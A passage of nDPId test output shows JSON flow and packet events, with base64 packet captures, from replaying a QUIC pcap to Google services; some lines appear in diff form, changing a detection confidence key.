RtQFu9IMWDE5dX\/3mWizx7+qMJm47Fyoex2QVEdKtHErz\/i5jbltyKP+JlYh\/5iVhFxWpfjDpTOkH+CE\/A7gJzr87sNP+7VuTghxvarGALGRQvWB3CXNIrBOCA9jEhQerKbB8C97DJMm5tcWUZ65E7AYZouY8+zkDggzBLI+0JJ05RIaaHlApiwpsWJ2zl6F1m9w14xWaghs7jZgtgfJEpGiT74jl4pf2klaE21HmQ3jnkf6AGhbgdZBQmCO4EIpeWJZsQhwGl5VQuea9a84+ee5DEZk764Ux2ytifgViB44NxlhtfksBdQI6G+PUXELugH4wQ6SukmCIBACuFIfzQbiKGjpnRUkS7AmxTtYPrsIuSjFIrLSGd\/5Xekm02vVOPCc7EG+Woa7OletCxnuTQjLX8oheX0o2Op+1dBXeNai8Q63RlSaVEOBjEiXQnmJ5lR4kLHJAKgnnUly9\/g84JyqUljiN\/e8uABODq7kynlT0o2IN5CHpN2XfhoXZlxt2HiDrqvNzSKO3CpTZnnkJeJtK9cjSU1XxfkGr1TK+WrsxaOx2y4S6PIiErYJnObHfsCoROfZB5v6WjVW4TwLRypWRXulBOZly5TnbMAqCFsdN0gy6amJt3ngyiI1muUKlcYOXXmBVBPpum\/+c5TkiBPy0hZUTn3PK8vRrELBxFuvPrWR1GEbulof1jbR58Ncmb0rjGewwYSLgqvfw8fWuUbbODAYVLX15bmDoErj\/57wyWqkBS8kUoD3JZecSRs8Aps02NKyynCKHOlNpc8OBgCA4Ad6xJZK3IyyURTyz5JvyG0vAoHB8Htl9cCeXJkHl+hbzHpVtzHZa9PuVxTwrw5ZpWXJ3D7gYDf3YjByo50t9uNuwO1TdW6VEIoQ2YFWco6RoRPd9mEfRhGyA\/HMeXm4nHmXXkUxD0lWGhQ1X301intynkww+5gju+t6izkuTyIR+es3wNgXF3uDXXchyNcpEgdq6KXfVdg\/FtdXzMb3o20tlnu0aGTS9Ke8r2K9x5Uy5E4IMaNx46xDz\/FHeQCHMCFloD7HC0iGeHQTjamzHYw9Q9cx0UPZlEZjKGZ\/W9mm9Rh0pSLgVkS1htsYD6Bvo2h8czyqOaZf"} 02306{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":64,"flow_packet_id":3,"flow_last_seen":1621486386389,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621486386389,"pkt":"AAAAAAAAAAQAJ0huCABFAAViZZpAAH4R2k80uxSv0OWdUcLYAbsFTowYzv8AAB0I+aKrjQG3wPMAAEU063sPCo4ozMPxlUj\/bSPtY3+CzlLdcC7kUprewEjKm2OTMB65C2RpyTFK0qHd1UzUnN6U5dQGGKmwgsbIXIKSBC7aC9lk9\/7KSXCk70eFVpjOtIDpiKUi8vVDCcfV6kRbykQ1UG60rnGaessWOlmJYYUYrFTLfQgo1LVYDsFKsPtJ1s1kupvZUz7DtsLylFS2l34GkqtIScglkyae0GI8mViRVebeilzlJSvddjOZxdAXXrNZAwRXdoffLloV5HtcoTQxqkR0GAPQdvrWXk+SMlGx\/W7Ne49MxOoYqcb+ZEW\/cA0RMhYOyvvzwyDA6S9WR2IZmDOEetLTQcoqKQrcTga50K8d4JAO4kVEikYFtr5Bm1z+MiARlDwUJIa24qTqLJVIo5iKqG52c5DO3tsvK0vzd8pSllrOHA6f\/I4wQDPyPJtMgg5O1ZoG8De8l3r2ufSRHsnJkEpyqWGF1+ijD\/7lBI\/5nWTPn9fBbdQQQkTlCH2+hn3jyqGiasIwS76cDfQW7wvTATHGizCtUCL9RDngXJ4m60+cjB0gourDm90bfqwSQs1xt55IkE5JsBrjydZPyipe0uhIjm4KZxuvhAjYi7daB1ce\/\/+407cCf+sxxL7CWqTVDAtgj6KFZbP4hnyT9ga4vkmC3\/t2CtLgFM4\/LEuF4nmXrGayZvHNNVuso5WMvbM4gno9LWsv2kJV4dX1TThhLd\/wIxSNzjl0dXSOBZ7wgJEHEnznJuFVstXb3tQcV7X3RP\/hcXpU9XjjFPCV5oo1sQe64QtneNkxV2yjvvs4fEGTk+zfZAnlMw\/iFw5VrPsMS\/wDar7RyJvWTPrIcoFDMu0pl6zkP5Al5BXrxcNMZVEAv6FlHk7RldT5vteKHFUD2EG202+PzEtOTPlmqNG6eE17A10kl4\/4bK9PAjRlBlsdbWm59jtIwieLuyVkY3xNNoXmkXmw+HTfj8L6cgMab+8MVWKD6X2FNJX1Hh4plar7gQs1wBHs\/50jh9TX5uIoGdQRaAkCjse9rKdwxS\/mQ3AZwSCeTLDSDZ7HNKOkFvE4XF72wS8k1jEs8CQLMd5eF7YKEIwhKqSRCTAxxeIp83q7tXfO3G8oxX8DNBZyGPdzHTcD2B2+WzAACX+B3mJrQJ47ogTtd7hRxPzmVNoKxW1cJA2W8sth9y2x0M4tQfFNCg+y7Hjysh4guq6xCuiVT5xotwMwPSDBGNIuXj+rftzi7znrhrNAbCSXiAYGtGnmHBOghmDMitk72DkuK88UEA04IW2\/8fbI46r27QDrpS7pjckWTOaGJMfuh8JgHCaU9F5gWqtRhso3KChbMMFYhYXX8heyFp2QTjtSXCvmSvOb\/P4Saj9keRyVu6EwxUD\/Wvi1CQPZNexfLJTr4d0fY2EFznG9mLwUFqLk8x93VjpNxh9mUDOT+9FkN2OUAwfOdunZk+S7EQYfuz58Zq50dfTTQ4ytc1corJ8ZnuRFp7bcXIyr+r\/g0rxcm55mxTcduuOI43k6A\/u4kxcszhmg9OmUhSIdiyIqrI4cTDkvXweJOztAO+v1eNUC8H68zvSWSCyYfBS09v+biPzskrJYVcIdvRbgzNi1MALIo64umFnfoGW7g7tdRnTTtUaVJ7SjjCNftNOmI+oKGp0G6qA+uKDhFNzBEwpKt7nPh7uh8czyGQ5haYxO+MQIP6acb8ITWfq7ZBDLBK87VY24JBoDq6EX9\/nCN65uCe1Ka7quGr3dV6rIOhhe19uIvRjiUm2GbcXkIV4PPI8eo8VJ"} 00603{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":86,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","packets-captured":86,"packets-processed":85,"total-skipped-flows":0,"total-l4-payload-len":114750,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":64,"total-detection-updates":0,"total-updates":0,"current-active-flows":3,"total-active-flows":64,"total-idle-flows":61,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":280,"global_ts_msec":1621488172593} 00635{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":86,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621488172593,"flow_last_seen":1621488172593,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621488172593,"l3_proto":"ip4","src_ip":"159.117.176.124","dst_ip":"208.229.157.81","src_port":58337,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02311{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":86,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":65,"flow_packet_id":1,"flow_last_seen":1621488172593,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621488172593,"pkt":"AAAAAAAAAAQA2lQ0CABFAAViZb1AAH4R06SfdbB80OWdUePhAbsFTly0xv8AAB0IIYJbjKvcKZMAAEU0Tezktqb5jgj7Ctco9B1gEgebhfTklfJiWUvzvzXVx1e1KCfmB0CYkpgvAEMWkCN96k4yxgEJhItMoJtLxBJKjThyVwVNoJs4osfVKgvW27jc\/\/cMoYfkmt0BcMTE+S832TZqo7DcoxbJ4SED5T\/fELYc1YonSB\/W876e8faG5n9Z889N6aEcUSpAR1NRv\/LUdTkKc80E8eLY0MsHFlrDxy6CZovHJ1EZPsnxPU3xmuA6PKcoVZk5E7PnwPJWVDykRwGVsj3\/uqwsCOxMLScufsvGchEffztJ8Mjpf1xy0Hks4XzejPQm1+YDaRsdxSWXt45SRLIvo\/c6h5H5fCX4yZ2dh6e24j40pDTautPP1E4KkxfA2AopSrSKSf1UiAUXmQWbN\/kgMU18r7h5LyzlAMKuX8\/Ay6yq9jK87jtj+MIImpIKoL9MeHVOS5lygsoTWIqqynPssiNY6xC8pyJX6Ub4BO4F+0CReGOoAESo+zj9+lbUqbeb7h2ZFGxadMW1CyyleoZNnWar6Hz0+sxBH9qRVZU5Heht2DjEc+6NEcDLxV5EaOX94GYWpZ5FR0EacC16CngtIJvVS2Vy4VHEXkHxRQ\/E8+BlBf48jcRRSu6r+V6GHpQVxkfvTm75zRbp227tVm1MAOmDC4ptEOe+sdRM+KrFAvaHe3o8pZCxK\/7aYLbotm\/RZjsivWCu89Cmlg0uVcL6Bo5BPfMomqOupt99ASfgdLdPTXGKZLuwp3GgyZeH9wnyPMM2+7Ggpa0RPG\/l2tSy9nrzzP\/MgL6CqbtRTpr2wbBNd\/SlbwIb1c6hehW1bLPfXoYMcr0kEetxg6OaHbyEdd\/4Ggz4SeyO3GItOwerR7WYWNxOmqs9taE9J\/PhK6NBDsXc5h1tgICSKag9AJoKaM9ovRC5UgfrYrqgqF4SuseIOZvAOlPyRcpmSKooL1mlS9PJzoeolBQ4Q6A6x\/nvmxc72I7syFXnB044YwfE2N774LUPLvvOLCg6Im9ZhCD7p4F+CscFU38oxt25Ays+maqiXnRw3mGV9KfMCfeBg8fWwb36KsISX3CI+1rfMDf89m\/pkzSajfjHt8k3vTCGPK5nVGcTDfOSB9CGZ6SX8cHmOTNUvoBI7fCfE9\/8Ngy8sawBjS5kemk2pVar\/Qjc6ZWFlikqXDEg6gI3HlFx4rzttRuJpbdSVX3pGOgGMXPyrCnFjqgDg3Cu2Y3VVoKD9yvfxYbTeV+segTGzJ9TpKpIQ7l2mOQyzexa60jhCdWRVqP2SmFZC650dD3TPV5qrCw8uvxv\/Hwr9JxUCKr4vZ4MNIS1Qme31hh9cKk\/smw6+dP8LKPbRFjyi5hKalZAn2oi12OsRGCRrT+CZhgIm3EsqKl4eDAmzdpgh\/Xxnln2oigZwNL9aNU0vU6Ri2z6ptRUiK3E+ULse6j5hYRaWYH1k1ExTT3ucG4D4c7xsf3YTntqY+KTDBBG1sDbHwo3em6WCb7WG7xc0voquwvCfNxaCk3bAzckSDEa86uyeuxhABsH12KWz4kITx5OwWU+lhxFgwus9PGlUh3+t363ytP+xsR98JT4AH\/MTUvv9IyRtjule4mQon8WEXtnJYqcNEh5E2UIF8gnaLnV+hrmX90Z\/weVChYKzF3NgPl9LTYOKXHKx6sgO+65G03KKrg6J\/G\/Y28JZ444EBiIz1Vv3DiM9J4DLhOb6iB9GptUjPIDobrRPDlIYVvrbFerCtsjpuaVI\/H1eUosHYVIRS78lDJZULDLtLIu6mDP+sVB"} -00956{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":86,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621488172593,"flow_last_seen":1621488172593,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621488172593,"l3_proto":"ip4","src_ip":"159.117.176.124","dst_ip":"208.229.157.81","src_port":58337,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"clientservices.googleapis.com","user_agent":"dev Chrome\/92.0.4503.5 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00956{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":86,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621488172593,"flow_last_seen":1621488172593,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621488172593,"l3_proto":"ip4","src_ip":"159.117.176.124","dst_ip":"208.229.157.81","src_port":58337,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"clientservices.googleapis.com","user_agent":"dev Chrome\/92.0.4503.5 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 02311{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":65,"flow_packet_id":2,"flow_last_seen":1621488172891,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621488172891,"pkt":"AAAAAAAAAAQA2lQ0CABFAAViZb5AAH4R06OfdbB80OWdUePhAbsFTm8Pzf8AAB0IIYJbjKvcKZMAAEU0+s8UmerPzJNPf2vFFmMIxXzWOI8+nlMJBqPIX91\/fJ41T6FVJdyz55\/AUFcKq9ZZyk2YP1zAlqFolkkHkO3Xi8aifTMn51fKa2wn5Crg\/NezDOPCbLX1Xw15fkvxcQMtx4EhBp9vvHyapMkXhNDJRu9RXfR+jrCal+s6uozM4Bh\/jgsteWhVYvFutpLBcFpAsACOZOXcc76QRT29xwiI2HkTMraeke6E6Elw3fZ8\/x0cjiKmAdvj\/rbQ44niXNogWCExDiid2qXxV\/VGMqrcCQpdoi78teOlLV1cLZCyKK9Gz1YT8+74zc3fizqw3J2xo1b0u2CHknZb06C+uIl7e5NEZUm2WVVu0v4iXHKkXSNY51UoQsVSs9xffcs1c0GmB\/wh2f7GXXXrVNip8rLBByPg2DJfrk+PoxGJ3J1kwQ1qDmOjB+UdN6fAUDfkxumO+fJw5izefocSJigy5LmmrjyewC9W+CDD3xJ\/cFzJCoFgSyf95fZ38+c\/H2rJBuKCVW1pdiho\/NBYDfaWuy5vckCjxN4xZv2JHxLWOVrRbclHG\/W4SWRZQP56mfXat0F0uG7PtJ8CgwXQ7NSbWtihIdZ43Ml3L0hioaK94VzmiCutO2T6s1ZqHQABM0\/PLZwtIpO3lBVHxkmK8czxVU2bfhh8Bd2aiAShWCZbWF5jU8EnQsfhGgHyekqxaLTahPiDCOg0SBmkozlENpi+0yMs2D5IkWhpyqBstkxFFNgybyAV5r6Lhm7JHwq3ZfXZFrRSuhRUAeCOh+NaYs7welFWYGPQBos2AQTRUC3NlRnOAtgvnKyVKOW2QjRgtqEzb4WdTL0bbNQ2FQpc9GYYE\/flJ2uoIFGQuv3JETxQMq9QMyae75gPV\/Bj+xdFH57XdiAsHKWYX7zqDRuKxKMuekYDDstuaLV4VDQc6MVZaJFii0GEv\/SupV\/58ZZpNHFEEyZHJzfkH2tbuh5MUuS5PofLOSzfTRmu+vMjtYQ209SICOmLVwPZ8u2AGrlFW2EqkZfbKI9erViZ2Unn0RZM2Pn+Wgst22Sb5g8wjh4wiA9weFHLORi1vWiHZkYe2\/BL8j1rJOY+xONNiXjbzvs+yXxIs+kJcjMnf6gyaovRvL\/c6j4rDv+KS6KHyF5Hju3yVQObDWEk+4j7PY+PaxYyvjYZHI36l3YksknZbaOMlMvl6nVwtU\/k8ACWq1HuEpfSG1UyrshCoDlTkhmlMZlMD7qdLPEuFj6m4MSRbjzW3hQa\/qxU3T2Qgki9LeSxXGYHJB9FXzq8yIQ0vOgWUQBxW\/4B0BqwQlgEeI27byi7vI9kmpC7Qou2YWyfsYTI9GGARRW7m5xU+maz8hHKd9KDfpthCymON5jJnYSptI3eug5aoGebEfP5bAslTyRCDFlm2Q8uSYfqFoNXujhc5z8WRPjLGKq59LGiZiW\/yB6lByCmmdTIYea2rAoFVqdYtPOdeFLrrKWhD5CpJEWImL1e1iTCT+E807\/aKY4QGP2WsFpn7d+gLCr5xQK6CXuhhNH9slGRzedlepwRyZh\/3i53f2a3Gl9RXi3N64p6CoFGMqiF8smMYblBOriOhOrEkIll8SQrZsnx81mclM\/4eF2UVnsQIp5n07HaGrEdZCT8fSndvbKLHO\/t6xkch5Ixv6BouSjYWklnDUEpJZz+jrQFC2wuRvZqOy6nf4lhu\/4E2kmpv\/MgYvFMVgKwJlJICexzBQbnudDHL7qYGQXGmi1uMwd9ljoVOFUJTpmzZx2wQtELSWXl0AWl"} 02312{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":65,"flow_packet_id":3,"flow_last_seen":1621488173506,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621488173506,"pkt":"AAAAAAAAAAQA2lQ0CABFAAViZb9AAH4R06KfdbB80OWdUePhAbsFToJhz\/8AAB0IIYJbjKvcKZMAAEU0qqZ2\/TuAubKLOjJ81oMaQxBMQ+\/6Vw7RaaKNzHvrM1NT+orB\/NmJSKxGxbSKEavrqUsSfkdDyIeYu3DeilK2GpCIubh8xfR7tcGDs399cvt3jBHRuuErN+rqniq2AF218asFOb+4ZGYSRPk5EdOKXsHpM4jOO5Xn\/0nKFyhG9EYHqVO8+pB7f6yczQlCMtDLF7lTT1tq0Xx5\/GJD9G0tCnOfX23fuY+en2OxpF0Q0PgXWtcsqYDtzTUWjmLH9BCjSI2kYYeo50ocz2WBWTGUXpoqJ9iYBz24Ky503DT5070a\/wp9cUFkXCNTV2eHv4keTxj9VvDD+Oi66PuHhOmSDrAohpZ0xItBmFaH47riNVmR0f7T0zfIhWCnOcjR4SomjPDBWcliBXMeSR14Qltlyc2kedQT7ZLDVfShl8+u3uS+zP8eyCq9nqBKQBMDF3cRxR6L9pGoibjSnh\/b6YBpwD7F5mcjWWjHHKVaxCEGQReuxjIGxxYeVTuCdqjXIwa0Izsll9LqeaEweLCNX8z\/\/CZA3pA9mivC5xkaqkyX9Ux4LPkC+WULQxMZBpEoE79XgttU5rCxCA8WEYInE4gplnnN12fNrAq7oK+ddinTvJs0+jBDZTCzpU5n0HC2WICnWxzQMAjhLIg\/BIVwHRaFAYw4Do1nKdRZ3+Sk32nhis1tvF4rOVrl8+QuSs+KqMidgjtjP4SWdcX\/X8u2OzpzpdBsJdPiiV1fZ6dss\/sv6xMaQ9B5Gojobr89aeGChzGbohXQd5y+iFUBt1VsbEb5dhDDvDWxob504mm+e8jfdDuh3GB0n6pHxwhoVSFVO0mUera+adQA3\/opY719kwV\/jWZYsfN5slbWhOML1HIQ5QADeewjbYw54FRDTOuqIEIQbZ9eM\/tKlt3HYJQncTGCiHf2mm1doGvuzgFM0BmQfN90m\/alC4XLQIUhU8uiZL5CekhxJSUTgbyaSPP5TKOnCqgDTVfMKVsJwC7ux18\/QNJq+Ao9ADSnhw1UkHTxFxUqNTpfucOEexD48oLEIifV\/GQ5Y7cYnaT6cfEnC0SeITsljquMY3Vr79yR+QT5dEIT2QkhSvvCGGW\/JaK9qcRkCLlnq0aJaQUiowTpWicqExI5X+zS+4f9cimXTb1tdSX+O2UlnWTkunOyyMLCdR06IG83Z2X7B68oZ5TXGb1vA2xmZqHXtvssbw5o3OZ\/M9ztrfZLxtw7s8Pk6oU7LSRvamoE2v0G9pXaI5VrazOyfxbUNSpQmwOmJe459lT4Qg\/CnThmMtCEXTzATibzMPGsrla5NWj1q5gr9q3cviQjSSPHCEIDuTp5wrZMCiLpv2tpEgI1rY246nmnSiDYby74PkSaGM0LCk4dDOKWAhuy+SIWuf9+uyIIqBmolfwWUmGX4ONSUzWAjAWNs2YzUhcxe+89BPXzlrVFcxvo28wdQF4wSVKN2VK78RJt0mrleR\/3P9HW80AETxSMIAaEoEcHDp\/lwJVPxAJL45U914u61nAp6JUN9jjimYNkNOeCLWI6j0GQS0Xi6UYYe2RkTF7sTCWShKI7ICgWwC12IaNxcPgDzh7ZJ5NhRgId1zLe42\/4\/EcfTgM0eAjGVTGUnREGIUVXj90QTn7l3oLmTduz\/OspCcyyktZYIOsHK+50LEMXLZUzKDQljXLHjWdmlr2k+azMseDn\/5zu4+kAWTW9dTENdlnZVBC1XVkmAgizBXmK\/6e5hjHzv+Y\/zyTl7BZXDbv8FjjkJrCJK9tXBh9Xzwcqbagr"} -00742{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":90,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1621486316206,"flow_last_seen":1621486318293,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5400,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621488174706,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"208.229.157.81","src_port":50588,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} -00742{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":90,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1621486385474,"flow_last_seen":1621486387592,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5400,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621488174706,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"208.229.157.81","src_port":49880,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} -00741{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":90,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1621486369476,"flow_last_seen":1621486371605,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5400,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621488174706,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"99.42.133.245","src_port":61089,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} +00742{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":90,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1621486316206,"flow_last_seen":1621486318293,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5400,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621488174706,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"208.229.157.81","src_port":50588,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} +00742{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":90,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1621486385474,"flow_last_seen":1621486387592,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5400,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621488174706,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"208.229.157.81","src_port":49880,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} +00741{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":90,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1621486369476,"flow_last_seen":1621486371605,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5400,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621488174706,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"99.42.133.245","src_port":61089,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} 00603{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":90,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","packets-captured":90,"packets-processed":89,"total-skipped-flows":0,"total-l4-payload-len":120150,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":65,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":65,"total-idle-flows":64,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":289,"global_ts_msec":1621489064431} 00633{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":90,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621489064431,"flow_last_seen":1621489064431,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621489064431,"l3_proto":"ip4","src_ip":"159.117.176.124","dst_ip":"198.74.29.79","src_port":49867,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02307{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":90,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":66,"flow_packet_id":1,"flow_last_seen":1621489064431,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621489064431,"pkt":"AAAAAAAAAAQA8lpWCABFAAViaqxAAH4RWVOfdbB8xkodT8LLAbsFTrHDzf8AAB0IkZSau0whIqIAAEU0rkimartPZo3XhAXpouf99lPyA4vPJfhF3sf1D80fQsd6hKzlDSeSsZ1KyRiDq23Zc4xu7yZSamgh8nd6IyVTF7B8MySKONiiaOY7dBSEC0bp4AebJ3k9Uh+OOZq1GyBDHDSVQ3BCXr14N2BMEqsgITpqPo+Z792Msbma9ODtfxa1MtHVKjQ15xkDF4+So8i\/fjbAfOViRfLKHxw\/jO95gtHmKOmNKHB+nvq+muN+iHIbHDxcpnXnO6PuxaBm23tYOT0PH9TUnUOZWqCNY2p9QM7ZIgufCDLh8c4C\/NFv9tZwBa9qhWLW6ebYQbaildftHqg7LB2KmNDXg69lhWaxLtl4+vEH9U9m2NQrOHQ8oFyTBFFkoewhMmDe5wHcaBJAO22wMqllFBpPnpzOCMy\/DJyHizv1if27VSaBPv3oEozht0\/dit4QAWrhZlnDelbE2T\/59x3uh6ABXgAV0b\/BloP7H5Pv9njEs3lHJOz7dFzr8iIjfB3B+OpQ5iUcuq9FxMhcezvIQOTkxNLORi6FlvB2GNGwRg+rukfVzwMeVbcyJ4bxFt9mc1MOr\/FkhpLL7F3QAjXoJvtrBiJncMoLXPRxAcMFUlowojaTi47EoeY8wguEuf7S86c2o+PQ1edefZeGvN87Fj\/fTTENh3Fn3S0OsYOmjnoXwQbxlBLOKTRd2KGqC3a92N1etrZBlnzvhACTKJeh8oRfYYE4DO+7CgxV4zH9ZFi7iaFktcfGl8Qu0FK6cb5HhSbMXyyvDCuCWYLd0ovyzFo0PNVt6yeC7MWIrgENNxCpTwOvjKs0+xlEsZf\/950lvdpBdkdhcTjSV34d2kg0KiEp6WKDoRhKAAnK2OjPGibxjk5vdFxY91t13JpZ9htdqGGMPDekPyxWc83i1LGMSQbz7QKh0X0aMz5ybK9\/HbZcAK3XSa0dobDV5b7WeSDsU\/3gkn5RaztmQfVs3owjzIYFbp5Buyz0Gxwz5Bi8H